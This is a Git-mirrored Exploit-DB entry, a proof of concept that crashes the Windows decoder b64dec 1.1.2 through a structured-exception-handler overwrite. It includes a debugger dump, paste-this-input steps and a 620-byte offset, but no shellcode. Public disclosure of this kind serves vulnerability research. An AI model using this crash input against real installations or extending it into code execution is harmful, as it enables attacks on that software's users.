bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/39070.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

52 lines
No EOL
1.5 KiB
Text
Raw Blame History

********************************************************************************************
# Exploit: b64dec SEH OverWrite.
# Date: 12/18/2015
# Exploit Author: Un_N0n
# Vendor: Tim Rohlfs
# Software Link: http://4mhz.de/b64dec.html
# Version: 1.1.2
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Dump]
SEH chain of thread 00000EC0
Address SE handler
024CFC50 b64dec.00458140
024CFC5C b64dec.004581B3
024CFF28 b64dec.0045847C
024CFF00 41414141 <-------
41414141 *** CORRUPT ENTRY *** <-------
----------------------------------------------------
024CFEE4 41414141 AAAA
024CFEE8 41414141 AAAA
024CFEEC 41414141 AAAA
024CFEF0 41414141 AAAA
024CFEF4 41414141 AAAA
024CFEF8 41414141 AAAA
024CFEFC 41414141 AAAA
024CFF00 41414141 AAAA Pointer to next SEH record <-----
024CFF04 41414141 AAAA SE handler <-----
024CFF08 41414141 AAAA
024CFF0C 41414141 AAAA
024CFF10 41414141 AAAA
024CFF14 41414141 AAAA
024CFF18 41414141 AAAA
[How to?]
1 - Open up b64dec.exe
2 - In Search field, paste in the contents of Crash.txt
3 - Hit 'Decode'
~ Software Crashes due to SEH Over-Write.
[Crash.txt?]
AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD
--------------------------------------|-----|
NSEH SEH
[Extra Info]
Offset = 620
********************************************************************************************
Reference in a new issue View git blame Copy permalink